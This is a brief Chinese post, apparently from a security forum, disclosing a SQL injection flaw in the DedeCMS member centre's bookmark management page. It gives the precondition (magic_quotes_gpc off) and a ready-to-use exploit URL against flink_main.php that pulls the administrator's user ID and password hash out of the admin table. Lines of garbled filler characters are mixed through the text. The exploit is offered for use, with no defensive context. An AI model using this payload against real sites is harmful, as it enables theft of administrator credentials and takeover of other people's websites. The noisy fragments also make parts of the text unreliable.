DedeCMS会员中心SQL注射漏洞: H( V# a% H6 U- `
需要magic_quotes_gpc = Off
) V5 |& M* h1 G0 L$ I0 p会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
8 D W& X9 z- I; K- w/ W/ T
0 A. H) c1 { s fDedeCMS会员中心书签管理SQL注射漏洞( d* |: {) {! G. o
成功利用该漏洞可获得管理员密码! P2 I) O- C6 R' s% _
4 f5 E4 R" b* u" y* |会员登录后可以执行SQL语句查询数据库任意内容如管理员密码# x. e* y5 h; U+ {4 ^; M& o$ N
9 Z# F. C5 Z0 ?& p
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r3 J1 x" L5 h, S% F) K
|